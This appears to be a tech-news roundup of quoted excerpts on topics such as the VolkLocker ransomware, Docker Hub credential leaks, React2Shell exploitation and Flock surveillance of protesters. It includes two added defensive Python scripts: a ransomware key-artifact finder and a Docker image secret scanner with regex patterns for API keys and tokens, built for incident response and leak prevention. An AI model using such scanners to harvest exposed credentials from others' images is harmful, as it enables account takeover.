Both the Crystal Super Micro-OLED and the Dream Air utilize the same optical stack, featuring 4K Sony micro-OLED panels per eye and Pimax’s proprietary “ConcaveView” lens technology. The company noted that the Dream Air SE is positioned as a more affordable version of the Dream Air, though it also utilizes the ConcaveView lenses.

Through close collaboration with hardware partners, Pimax stated that it aims to demonstrate how high-end PCVR can reach its full potential as part of a complete ecosystem. Attendees at CES were able to experience motion feedback and control systems across racing, flight, and active VR setups.

Auganix Managing Editor Sam Sprigg tries a racing sim demo with Pimax’s new Dream Air headset at CES 2026.

Source: Pimax debuts Crystal Super Micro-OLED, Dream Air, & Dream Air SE

Spotify was down this morning for thousands of users

My boyfriend texted me those dreaded four words: “Is your Spotify down?” Sure enough his, mine and thousands of other users’ Spotify accounts appear to be down and out at the moment, with Downdetector recording over 10,000 reports from users.

Spotify is apparently working on the problem. The account, Spotify Status, shared an update on X at 9:45 AM on Monday, “We’re aware of some issues right now and are checking them out!” About an hour later, the company shared an update saying that the outage was resolved as of 10:34 AM ET.

Source: Spotify was down this morning for thousands of users: Updates on the widespread outages

After Samsung forces Gemini, LG TV users get unremovable Microsoft Copilot through forced update

LG smart TV owners are reporting that a recent webOS software update has added Microsoft Copilot to their TVs, with no apparent way to remove it. Reports first surfaced over the weekend on Reddit, where a post showing a Copilot tile pinned to an LG TV home screen climbed to more than 35,000 upvotes on r/mildlyinfuriating, accompanied by hundreds of comments from users describing the same behavior.

According to affected users, Copilot appears automatically after installing the latest webOS update on certain LG TV models. The feature shows up on the home screen alongside streaming apps, but unlike Netflix or YouTube, it cannot be uninstalled.

LG has previously confirmed plans to integrate Microsoft Copilot into webOS as part of its broader “AI TV” strategy. At CES 2025, the company described Copilot as an extension of its AI Search experience, designed to answer questions and provide recommendations using Microsoft’s AI services. In practice, the iteration of Copilot currently seen on LG TVs appears to function as a shortcut to a web-based Copilot interface rather than a fully native application like the one described by LG.

The issue, for many, isn’t necessarily what Copilot does, but that it has been forced onto consumers with no option to remove it. LG’s own support documentation notes that certain preinstalled or system apps cannot be deleted, only hidden. Users who encounter Copilot after the update report that this limitation applies, leaving them with no way to fully remove the feature once it has been added. It’s a similar story on rival models: for instance, some Samsung TVs include Gemini.

The overwhelmingly negative reaction from users indicates a growing frustration with AI features being imposed on consumers in every way possible. Smart TVs have naturally become platforms for advertising, data collection, and now AI services, with updates adding new functionality that owners did not explicitly request and, in most cases, do not want. While LG allows users to disable some AI-related options, such as voice recognition and personalization features, those settings do not remove the Copilot app itself.

Ultimately, those wanting to minimize Copilot’s presence on their TVs are limited to keeping it disconnected from the Internet. That’s about the most that can be done at the moment, unless LG backtracks and either allows users to disable or completely uninstall the app in response to backlash, which seems unlikely.

Source: LG TV users baffled by unremovable Microsoft Copilot installation — surprise forced update shows app pinned to the home screen | Tom’s Hardware

Google Translate expands live translation to all earbuds on Android

[…]

The latest version of Google’s live translation is built on Gemini and initially rolled out earlier this year. It supports smooth back-and-forth translations as both on-screen text and audio. Beginning a live translate session in Google Translate used to require Pixel Buds, but that won’t be the case going forward.

Google says a beta test of expanded headphone support is launching today in the US, Mexico, and India. The audio translation attempts to preserve the tone and cadence of the original speaker, but it’s not as capable as the full AI-reproduced voice translations you can do on the latest Pixel phones. Google says this feature should work on any earbuds or headphones, but it’s only for Android right now. The feature will expand to iOS in the coming months. Apple does have a similar live translation feature on the iPhone, but it requires AirPods.

[…]

Google also debuted language-learning features earlier this year, borrowing a page from educational apps like Duolingo. You can tell the app your skill level with a language, as well as whether you need help with travel-oriented conversations or more everyday interactions. The app uses this to create tailored listening and speaking exercises.

[…]

Source: Google Translate expands live translation to all earbuds on Android – Ars Technica

Russian hackers debut ransomware service on Telegram. Hardcode the keys in plaintext in tempdir.

CyberVolk, a pro-Russian hacktivist crew, is back after months of silence with a new ransomware service. There’s some bad news and some good news here.

First, the bad news: the CyberVolk 2.x (aka VolkLocker) ransomware-as-a-service operation that launched in late summer. It’s run entirely through Telegram, which makes it very easy for affiliates that aren’t that tech savvy to lock files and demand a ransom payment.

CyberVolk’s soldiers can use the platform’s built-in automation to generate payloads, coordinate ransomware attacks, and manage their illicit business operations, conducting everything through Telegram.

But here’s the good news: the ransomware slingers got sloppy when it came time to debug their code and hardcoded the master keys – this same key encrypts all files on a victim’s system – into the executable files. This could allow victims to recover encrypted data without paying the extortion fee, according to SentinelOne senior threat researcher Jim Walter, who detailed the gang’s resurgence and flawed code in a Thursday report.

[…]

“Our analysis reveals an operation struggling with the challenges of expansion: taking one step forward with sophisticated Telegram automation, and one step backward with payloads that retain test artifacts enabling victim self-recovery,” Walter wrote.

[…]

In November, the ransomware operators began advertising standalone RAT and keylogger tools and advertised these pricing models:

  • RaaS (single OS): $800-$1,100 USD
  • RaaS (Linux + Windows): $1,600-$2,200 USD
  • Standalone RAT or Keylogger: $500 USD each

Once the ransomware has been deployed on victims’ systems, it escalates privileges, bypassing Windows User Account Control (UAC) to execute malware with admin-level privileges. It determines which files to encrypt based on exclusion lists for specific paths and extensions that have been configured in the malware’s code, and the ransomware uses AES-256 in GCM mode (Galois/Counter Mode) for file encryption.

But, here’s where the malware developers screwed up: VolkLocker doesn’t dynamically generate encryption keys, but rather hardcodes them as hex strings, and writes a plaintext file with the complete master encryption key in the %TEMP% folder.

The plaintext master key “likely represents a test artifact inadvertently shipped in production builds,” Walter wrote. “CyberVolk operators may be unaware that affiliates are deploying builds with the backupMasterKey() function still embedded.”

This “suggests that the operation is struggling to maintain quality control while aggressively recruiting lesser-skilled affiliates,” he added.

[…]

Source: Russian hackers debut simple ransomware service • The Register
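For incident responders, the flaw described above suggests a concrete triage step: preserve any small plaintext file in the temp folder that holds a 64-character hex string, since 64 hex characters are exactly one 32-byte AES-256 key. The sketch below is an added example, not code from the SentinelOne report; the file names, the size limit and the sample key are constructed assumptions, and the report's actual file name is not given on this page.

```python
import hashlib
import re
from pathlib import Path

# 64 hex chars = 32 bytes = one AES-256 key. The lookarounds reject longer hex
# runs. A SHA-256 digest has the same shape, so hits are candidates only.
HEX_KEY = re.compile(rb"(?<![0-9A-Fa-f])[0-9A-Fa-f]{64}(?![0-9A-Fa-f])")
SAMPLE_KEY_HEX = "00112233445566778899aabbccddeeff" * 2  # constructed, not a real key


def _as_ascii(data: bytes) -> bytes:
    """Windows tools often write UTF-16 text; normalise it before matching."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16", errors="ignore").encode("ascii", errors="ignore")
    return data


def find_key_artifacts(temp_dir, max_size=4096):
    """List small files under temp_dir that contain a candidate 256-bit hex key.

    The key itself is never returned, only a short SHA-256 fingerprint of it,
    so the triage report can be shared without spreading key material.
    """
    results = []
    for path in sorted(Path(temp_dir).rglob("*")):
        try:
            if not path.is_file() or path.stat().st_size > max_size:
                continue
            data = _as_ascii(path.read_bytes())
        except OSError:
            continue  # locked or unreadable file: skip, do not abort the sweep
        for match in HEX_KEY.finditer(data):
            key = bytes.fromhex(match.group(0).decode("ascii"))
            if len(set(key)) < 8:
                continue  # padding such as 64 zeros is not plausible key material
            results.append({
                "name": path.name,
                "path": str(path),
                "size": path.stat().st_size,
                "fingerprint": hashlib.sha256(key).hexdigest()[:12],
            })
    return results


def shared_builds(hits_by_host: dict) -> dict:
    """Map each key fingerprint to the hosts it was seen on.

    A hardcoded key is identical on every machine hit by the same build, so one
    fingerprint across several hosts points to a single payload build.
    """
    seen = {}
    for host, hits in hits_by_host.items():
        for hit in hits:
            seen.setdefault(hit["fingerprint"], set()).add(host)
    return {fp: sorted(hosts) for fp, hosts in seen.items()}


def build_sample_temp(root):
    """Constructed test data: two real-looking hits and three non-hits."""
    root = Path(root)
    (root / "constructed_key_dump.tmp").write_bytes(SAMPLE_KEY_HEX.encode() + b"\n")
    (root / "notes_utf16.txt").write_bytes(("key=" + SAMPLE_KEY_HEX).encode("utf-16"))
    (root / "hash63.log").write_bytes(b"a1" * 31 + b"b")       # 63 hex chars: too short
    (root / "zeros.txt").write_bytes(b"0" * 64)                  # low-variety filler
    (root / "big.bin").write_bytes(SAMPLE_KEY_HEX.encode() + b"\n" * 5000)  # over size cap


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_temp(tmp)
        for hit in find_key_artifacts(tmp):
            print(hit["name"], hit["size"], hit["fingerprint"])
```

Copy any hit to evidence storage before cleaning the temp folder, because that file may be what allows recovery without payment.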

US State Dept to Stop Using Calibri Font, go back to Times New Roman in Anti-DEI Push

Secretary of State Marco Rubio sent a memo on Tuesday ordering everyone at the U.S. State Department to use Times New Roman for all official government documents, according to the New York Times. What’s behind Rubio’s sudden obsession with fonts? The Secretary thinks the current typeface being used, Calibri, is too woke.

Rubio’s memo was titled “Return to Tradition: Times New Roman 14-Point Font Required for All Department Paper,” according to the Times and Reuters, which obtained a copy of the memo.

“To restore decorum and professionalism to the Department’s written work products and abolish yet another wasteful DEIA program, the Department is returning to Times New Roman as its standard typeface,” the cable said.

[…]

You can’t make this up

Source: Marco Rubio Orders State Dept to Stop Using Calibri Font in Anti-DEI Push

Over 10,000 Docker Hub images found leaking credentials, auth keys

More than 10,000 Docker Hub container images expose data that should be protected, including live credentials to production systems, CI/CD databases, or LLM model keys.

The secrets impact a little over 100 organizations, among them a Fortune 500 company and a major national bank.

[…]

After scanning container images uploaded to Docker Hub in November, security researchers at threat intelligence company Flare found that 10,456 of them exposed one or more keys.

The most frequent secrets were access tokens for various AI models (OpenAI, HuggingFace, Anthropic, Gemini, Groq). In total, the researchers found 4,000 such keys.

When examining the scanned images, the researchers discovered that 42% of them exposed at least five sensitive values.

“These multi-secret exposures represent critical risks, as they often provide full access to cloud environments, Git repositories, CI/CD systems, payment integrations, and other core infrastructure components,” Flare notes in a report today.

[…]

According to the researchers, one of the most frequent errors observed was the use of .ENV files that developers use to store database credentials, cloud access keys, tokens, and various authentication data for a project.

Additionally, they found API tokens for AI services hardcoded in Python application files, config.json files, and YAML configs, along with GitHub tokens and credentials for multiple internal environments.

Some of the sensitive data was present in the manifest of Docker images, a file that provides details about the image.

Many of the leaks appear to originate from the so-called ‘shadow IT’ accounts, which are Docker Hub accounts that fall outside of the stricter corporate monitoring mechanisms, such as those for personal use or belonging to contractors.

Flare notes that roughly 25% of developers who accidentally exposed secrets on Docker Hub realized the mistake and removed the leaked secret from the container or manifest file within 48 hours.

However, in 75% of these cases, the leaked key was not revoked, meaning that anyone who stole it during the exposure period could still use it later to mount attacks.

Organizations should implement active scanning across the entire software development life cycle and revoke exposed secrets and invalidate old sessions immediately.

Source: Over 10,000 Docker Hub images found leaking credentials, auth keys
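To make the "active scanning" recommendation concrete, here is an added example (not Flare's tooling) that scans a `docker save` tarball before it is pushed: it checks the image config's `Env` and build history as well as every file in every layer, and flags secrets that a later layer "deleted", because the earlier layer still ships them. The detection rules are simplified assumptions and every secret in the sample image is constructed.

```python
import io
import json
import posixpath
import re
import tarfile

# Simplified, illustrative rules; real scanners ship far larger rule sets.
RULES = {
    "openai_style_key": re.compile(r"\bsk-[A-Za-z0-9_-]{20,}"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "generic_assignment": re.compile(
        r"(?i)\b\w*(?:secret|token|passw(?:or)?d|api_?key)\w*\s*[=:]\s*['\"]?[^\s'\"]{8,}"),
}
MAX_FILE = 1 << 20  # skip files over 1 MiB


def _hits(text, where, layer=None, path=None):
    """Return one redacted finding per line; the first matching rule wins."""
    found = []
    for line in text.splitlines():
        for rule, rx in RULES.items():
            m = rx.search(line[:4096])
            if m:
                found.append({"where": where, "layer": layer, "path": path,
                              "rule": rule, "preview": m.group(0)[:6] + "..."})
                break
    return found


def scan_image(image_tar: bytes) -> list:
    """Scan config Env, build history and all layer files of a saved image."""
    findings, whiteouts = [], {}
    with tarfile.open(fileobj=io.BytesIO(image_tar), mode="r:*") as img:
        entry = json.load(img.extractfile("manifest.json"))[0]
        config = json.load(img.extractfile(entry["Config"]))
        for var in (config.get("config") or {}).get("Env") or []:
            findings += _hits(var, "config.Env")
        for step in config.get("history") or []:
            findings += _hits(step.get("created_by", ""), "config.history")
        for idx, layer_name in enumerate(entry["Layers"]):
            blob = img.extractfile(layer_name).read()
            with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as layer:
                for member in layer:
                    base = posixpath.basename(member.name)
                    if base.startswith(".wh."):
                        # Whiteout: a later layer hides this path, but the
                        # bytes stay in the earlier layer's tarball.
                        gone = posixpath.join(posixpath.dirname(member.name), base[4:])
                        whiteouts[gone] = idx
                    elif member.isfile() and member.size <= MAX_FILE:
                        text = layer.extractfile(member).read().decode("utf-8", "replace")
                        findings += _hits(text, f"layer{idx}:{member.name}", idx, member.name)
    for f in findings:
        f["deleted_later"] = f["layer"] is not None and whiteouts.get(f["path"], -1) > f["layer"]
    return findings


def _tar(files: dict) -> bytes:
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as t:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            t.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def build_sample_image() -> bytes:
    """Constructed image in `docker save` layout; every secret here is fake."""
    env_file = (b"DB_PASSWORD=constructed-not-real-pw\n"
                b"OPENAI_API_KEY=sk-CONSTRUCTEDexample0000000000\n")
    config = {
        "config": {"Env": ["PATH=/usr/bin", "GITHUB_TOKEN=ghp_" + "A" * 36]},
        "history": [{"created_by": "|1 API_TOKEN=constructed-build-arg /bin/sh -c pip install -r requirements.txt"}],
    }
    manifest = [{"Config": "config.json", "RepoTags": ["example/app:latest"],
                 "Layers": ["layer0.tar", "layer1.tar"]}]
    return _tar({
        "manifest.json": json.dumps(manifest).encode(),
        "config.json": json.dumps(config).encode(),
        "layer0.tar": _tar({"app/.env": env_file, "app/main.py": b"print('hi')\n"}),
        "layer1.tar": _tar({"app/.wh..env": b""}),  # later layer "deletes" .env
    })


if __name__ == "__main__":
    for finding in scan_image(build_sample_image()):
        print(finding)
```

A finding with `deleted_later` set means the file is hidden in the final filesystem but still downloadable with the image, so the credential has to be revoked, not just removed.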

Half of exposed React servers remain unpatched amid attacks

Half of the internet-facing systems vulnerable to a fast-moving React remote code execution flaw remain unpatched, even as exploitation has exploded into more than a dozen active attack clusters ranging from bargain-basement cryptominers to state-linked intrusion tooling.

That’s the assessment from Alon Schindel, VP of AI and Threat Research at Wiz, who says CVE-2025-55182 – the React server-side vulnerability dubbed “React2Shell” – is now being actively exploited at scale, with researchers tracking at least 15 distinct intrusion clusters in the wild over the past 24 hours alone.

According to Wiz’s latest telemetry, roughly 50 percent of publicly exposed resources known to be vulnerable are still running unpatched code, giving attackers a comfortable head start.

The critical-severity flaw, first disclosed earlier this month, affects React Server Components and dependent frameworks such as Next.js and stems from unsafe deserialization in React’s server-side packages, allowing an unauthenticated attacker to send a crafted request to achieve remote code execution. As The Register previously reported, the bug quickly proved attractive to attackers because of React’s ubiquity in modern web stacks, particularly in cloud-hosted environments where a single exposed endpoint can provide a foothold into far larger estates.

What began as opportunistic scanning and cryptomining has now broadened into something messier. Wiz says it is seeing a clear split between “commodity” exploitation – dominated by familiar cryptomining operations using tools like Kinsing, C3Pool, and custom loaders – and more deliberate intrusion sets deploying post-exploitation frameworks and bespoke malware.

Among the clusters observed are Python-based campaigns masquerading as miner droppers while quietly exfiltrating secrets, Sliver command-and-control infrastructure used for hands-on-keyboard operations, and a JavaScript file injector that systematically infects every server-side *.js file it can reach. Wiz also reports the re-emergence of EtherRat backdoor variants, a family of malware that had previously fallen out of favor but appears to have been dusted off for this wave of exploitation.

The technical sophistication is also creeping upward. Multiple miscreants are actively attempting to frustrate incident response by manipulating timestamps, minimizing logs, and otherwise scrubbing evidence of compromise. Those anti-forensics techniques, Wiz warned, suggest operators who expect to be hunted and intend to linger.

[…]

Source: Half of exposed React servers remain unpatched amid attacks • The Register

Dark chocolate ingredient associated with lower apparent age

A natural chemical in dark chocolate may play a role in slowing certain signs of biological aging. Researchers at King’s College London have identified theobromine, a plant compound found in cocoa, as a possible contributor to this effect.

The study, published on December 10 in Aging, analyzed how much theobromine was present in participants’ blood and compared those levels with biological aging markers measured in blood samples.

What Biological Age Reveals

Biological age reflects how well a person’s body is functioning, rather than the number of years they have lived. This measure is based on DNA methylation, a collection of tiny chemical tags on DNA that shift as we grow older.

The research team examined data from two European groups, including 509 people from TwinsUK and 1,160 from KORA. Individuals with higher amounts of theobromine in their bloodstream tended to have a biological age that appeared younger than their chronological age.

[…]

Dr. Ricardo Costeira, a Postdoctoral Research Associate at King’s College London, said: “This study identifies another molecular mechanism through which naturally occurring compounds in cocoa may support health. While more research is needed, the findings from this study highlight the value of population-level analyses in aging and genetics.”

Although the findings are encouraging, the researchers caution that increasing dark chocolate consumption is not automatically beneficial. Chocolate also contains sugar, fat and other ingredients, and more work is needed to fully understand how theobromine interacts with the body and how it may influence aging.

Source: Scientists find dark chocolate ingredient that slows aging | ScienceDaily

Apple appeal loses vs Epic again. Google decides to settle with Epic.

Shortly after appeals court judges ruled against Apple’s contempt appeal in a years-long antitrust dispute against the makers of Fortnite, I got to talk to Epic Games CEO Tim Sweeney in an interview. According to Sweeney, today’s ruling “completely shuts down” Apple’s App Store rules that allow it to collect “junk fees.”

The three-judge Ninth Circuit Court of Appeals panel largely affirmed an April ruling that Apple failed to comply with Judge Yvonne Gonzalez Rogers’s 2021 order allowing app developers to link to external payment options, which Sweeney said “… is really awesome for all developers.”

Perhaps the most notable part of the appeals court ruling is that the panel is asking Gonzalez Rogers to look at ways Apple could charge developers reasonable fees for purchases made in apps using outside payment links. In her April ruling, Gonzalez Rogers blocked Apple from taking any fees from external payments because of decisions like slapping external payments with a 27 percent fee and forcing developers to make their payments links in plain text.

But the appeals court says Apple “should” be able to charge a fee based on “the costs that are genuinely and reasonably necessary for its coordination of external links for linked-out purchases, but no more” and that Apple is “entitled to some compensation for the use of its intellectual property that is directly used in permitting Epic and others to consummate linked-out purchases.”

“If you want to have an app go through review with custom linkouts, maybe there’s several hundred dollars of fees associated with that every time you submit an app, which is perfectly reasonable because there are real people at Apple doing those things and Apple pays them, and we should be contributing to that,” Sweeney says. But he says that the ruling, “completely shuts down, I think, for all time, Apple’s theory that they should be able to charge arbitrary junk fees for access.”

With these two areas that Apple would be allowed to charge for, Sweeney says that “I can’t imagine any justification for a percentage of developer revenue being assessed here.”

[…]

The ruling wasn’t the only big news for Epic and Fortnite on mobile today: the game also returned to Google Play in the US after similarly being booted by Google when Epic added the in-app payments system to Fortnite. Epic and Google announced last month that they have agreed to settle their lawsuit, and while the two sides are still seeking court approval for their settlement, it resolves their disputes worldwide.

[…]

Source: Tim Sweeney on the future of Fortnite after another win over Apple | The Verge

How Cops Are Using Flock’s license plate camera Network To Surveil Protesters And Activists

It’s no secret that 2025 has given Americans plenty to protest about. But as news cameras showed protesters filling streets of cities across the country, law enforcement officers—including U.S. Border Patrol agents—were quietly watching those same streets through different lenses: Flock Safety automated license plate readers (ALPRs) that tracked every passing car.

Through an analysis of 10 months of nationwide searches on Flock Safety’s servers, we discovered that more than 50 federal, state, and local agencies ran hundreds of searches through Flock’s national network of surveillance data in connection with protest activity. In some cases, law enforcement specifically targeted known activist groups, demonstrating how mass surveillance technology increasingly threatens our freedom to demonstrate.

Flock Safety provides ALPR technology to thousands of law enforcement agencies. The company installs cameras throughout their jurisdictions, and these cameras photograph every car that passes, documenting the license plate, color, make, model and other distinguishing characteristics. This data is paired with time and location, and uploaded to a massive searchable database. Flock Safety encourages agencies to share the data they collect broadly with other agencies across the country. It is common for an agency to search thousands of networks nationwide even when they don’t have reason to believe a targeted vehicle left the region.

Via public records requests, EFF obtained datasets representing more than 12 million searches logged by more than 3,900 agencies between December 2024 and October 2025. The data shows that agencies logged hundreds of searches related to the 50501 protests in February, the Hands Off protests in April, the No Kings protests in June and October, and other protests in between.

[…]

While EFF and other civil liberties groups argue the law should require a search warrant for such searches, police are simply prompted to enter text into a “reason” field in the Flock Safety system. Usually this is only a few words–or even just one.

In these cases, that word was often just “protest.”

Crime does sometimes occur at protests, whether that’s property damage, pick-pocketing, or clashes between groups on opposite sides of a protest. Some of these searches may have been tied to an actual crime that occurred, even though in most cases officers did not articulate a criminal offense when running the search. But the truth is, the only reason an officer is able to even search for a suspect at a protest is because ALPRs collected data on every single person who attended the protest.

[…]

In a few cases, police were using Flock’s ALPR network to investigate threats made against attendees or incidents where motorists opposed to the protests drove their vehicle into crowds. For example, throughout June 2025, an Arizona Department of Public Safety officer logged three searches for “no kings rock threat,” and a Wichita (Kan.) Police Department officer logged 22 searches for various license plates under the reason “Crime Stoppers Tip of causing harm during protests.”

Even when law enforcement is specifically looking for vehicles engaged in potentially criminal behavior such as threatening protesters, it cannot be ignored that mass surveillance systems work by collecting data on everyone driving to or near a protest—not just those under suspicion.

Border Patrol’s Expanding Reach

As U.S. Border Patrol (USBP), ICE, and other federal agencies tasked with immigration enforcement have massively expanded operations into major cities, advocates for immigrants have responded through organized rallies, rapid-response confrontations, and extended presences at federal facilities.

USBP has made extensive use of Flock Safety’s system for immigration enforcement, but also to target those who object to its tactics. In June, a few days after the No Kings Protest, USBP ran three searches for a vehicle using the descriptor “Portland Riots.”

[…]

Fighting Back Against ALPR

ALPR systems are designed to capture information on every vehicle that passes within view. That means they don’t just capture data on “criminals” but on everyone, all the time—and that includes people engaged in their First Amendment right to publicly dissent. Police are sitting on massive troves of data that can reveal who attended a protest, and this data shows they are not afraid to use it.

Our analysis only includes data where agencies explicitly mentioned protests or related terms in the “reason” field when documenting their search. It’s likely that scores more were conducted under less obvious pretexts and search reasons. According to our analysis, approximately 20 percent of all searches we reviewed listed vague language like “investigation,” “suspect,” and “query” in the reason field. Those terms could well be cover for spying on a protest, an abortion prosecution, or an officer stalking a spouse, and no one would be the wiser–including the agencies whose data was searched. Flock has said it will now require officers to select a specific crime under investigation, but that can and will also be used to obfuscate dubious searches.

For protestors, this data should serve as confirmation that ALPR surveillance has been and will be used to target activities protected by the First Amendment. Depending on your threat model, this means you should think carefully about how you arrive at protests, and explore options such as biking, walking, carpooling, taking public transportation, or simply parking a little further away from the action. Our Surveillance Self-Defense project has more information on steps you could take to protect your privacy when traveling to and attending a protest.

[…]

Everyone should have the right to speak up against injustice without ending up in a database.

Source: How Cops Are Using Flock Safety’s ALPR Network To Surveil Protesters And Activists | Techdirt

Simple light trick reveals hidden organic pathways in microscopic detail

Every tissue in the human body contains exceptionally small fibers that help coordinate how organs move, function and communicate. Muscle fibers guide physical force, intestinal fibers support the motion of the digestive tract, and brain fibers carry electrical signals that allow different regions to exchange information. Together, these intricate fiber systems help shape the structure of each organ and keep them operating properly.

[…]

Although these microscopic structures play essential roles, they have long been challenging to study. Researchers have struggled to determine how fibers are oriented inside tissues, which has made it difficult to fully understand how they change in health and disease.

A Simple Method for Revealing Hidden Microstructure

A research team led by Marios Georgiadis, PhD, instructor of neuroimaging, has now introduced an approach that makes these hard-to-see fiber patterns visible with exceptional clarity and at a relatively low cost.

Their technique, described in Nature Communications, is known as computational scattered light imaging (ComSLI). It can reveal the orientation and organization of tissue fibers at micrometer resolution on virtually any histology slide, regardless of how it was stained or preserved — even if the slide is many decades old.

[…]

ComSLI relies on a basic physical principle: when light encounters microscopic structures, it scatters in different directions based on their orientation. By rotating the light source and recording how the scattering signal changes, researchers can reconstruct the direction of the fibers within each pixel of an image.

The method requires only a rotating LED light and a microscope camera, making the setup accessible compared with other forms of advanced microscopy. After the images are collected, software analyzes delicate patterns in the scattered light to generate color-coded maps of fiber orientation and density, known as microstructure-informed fiber orientation distributions.

ComSLI is not limited by sample preparation. It works with formalin-fixed, paraffin-embedded sections (a standard in hospitals and pathology labs) as well as fresh-frozen, stained or unstained slides.

[…]

“This is a tool that any lab can use,” Zeineh said. “You don’t need specialized preparation or expensive equipment. What excites me most is that this approach opens the door for anyone, from small research labs to pathology labs, to uncover new insights from slides they already have.”

[…]

To test the limits of the method, the researchers analyzed a brain section prepared in 1904. Even in this century-old sample, ComSLI identified intricate fiber patterns, allowing scientists to study historical specimens and explore how structural features evolve across generations of disease.

Applications Beyond the Brain

Although first designed for brain research, ComSLI also works well in other tissues. The team used it to study muscle, bone and vascular samples, each revealing unique fiber arrangements tied to their biological functions.

In tongue muscle, the method highlighted layered fiber orientations linked to movement and flexibility. In bone, it captured collagen fibers that align with mechanical stress. In arteries, it showed alternating collagen and elastin layers that support both strength and elasticity.

This ability to map fiber orientation across species, organs and archival specimens could significantly change how scientists investigate structure and function.

[…]

Story Source:

Materials provided by Stanford Medicine. Note: Content may be edited for style and length.


Journal Reference:

  1. Marios Georgiadis, Franca auf der Heiden, Hamed Abbasi, Loes Ettema, Jeffrey Nirschl, Hossein Moein Taghavi, Moe Wakatsuki, Andy Liu, William Hai Dang Ho, Mackenzie Carlson, Michail Doukas, Sjors A. Koppes, Stijn Keereweer, Raymond A. Sobel, Kawin Setsompop, Congyu Liao, Katrin Amunts, Markus Axer, Michael Zeineh, Miriam Menzel. Micron-resolution fiber mapping in histology independent of sample preparation. Nature Communications, 2025; 16 (1) DOI: 10.1038/s41467-025-64896-9

Source: Simple light trick reveals hidden brain pathways in microscopic detail | ScienceDaily

Instacart Charging Customers up to 25% Different Prices for Same Products

How much does a carton of eggs cost? Depends on who you are. A new study produced in collaboration with policy group Groundwork Collaborative, Consumer Reports, and More Perfect Union found that people who purchased the exact same product from the exact same store at the exact same time were charged different prices—sometimes up to nearly 25% more—when placing the order on Instacart.

The study tapped 437 volunteer shoppers in four cities who were put in groups that were synced up virtually to add items from a specific grocery store into their Instacart shopping carts at the same time. They then reported the prices that appeared for researchers to determine if people were being charged different prices for the same goods.

The result was a pretty resounding “Yes.” According to the study, nearly three-quarters of all grocery items tested in the experiment produced multiple prices across shoppers, including some products that showed five different prices for the same product.

[…]

Researchers reported that the final total of the Instacart shopping carts varied by an average of 7% despite every item and condition being identical.

[…]

According to Consumer Reports, the company confirmed the study accurately reflected its pricing strategies, which it claims to only do at 10 partnering grocery retailers that it chose not to name.

[…]

While Instacart didn’t name the retailers they have partnered with for this program, the study did name where they performed their tests. One retailer was Target, and they found varying prices on items sold through Instacart from the retailer. Target told Groundwork Collaborative that it has no business relationship with Instacart and “does not directly share any pricing information with Instacart or dictate what Instacart prices appear on their platform.” Instacart acknowledged to the publication that it scrapes Target’s prices and adds an upcharge to offset “operating and technology costs.” So Target was seemingly not one of the 10 retail partners, but shoppers there were still exposed to price variance. Instacart claims it has ended pricing experiments at Target.

It certainly seems like the pricing discrepancies are an example of surveillance pricing, where consumers are served different prices based on information the platform knows about them. The study didn’t find any clear correlation that would link certain shopper demographic data and the prices they were presented, and Instacart told Consumer Reports that it doesn’t use any personal or demographic data from users in its pricing experiments and instead explained that customers are randomly assigned to price groups.

[…]

“These tests are not dynamic pricing – prices never change in real-time, including in response to supply and demand. The tests are never based on personal or behavioral characteristics — they are completely randomized,” an Instacart spokesperson told Gizmodo.

So Instacart’s varied pricing is allegedly part of an experiment that randomly assigns shoppers to different pricing groups, but brands whose goods are available on Instacart can use the company’s data-driven pricing platform to serve different prices based on different demographic data. For the end user, that likely feels like a distinction without a difference, as they are ultimately seeing different prices based on conditions that are outside of their control.

Source: Instacart Charging Customers Different Prices for Same Products, Study Finds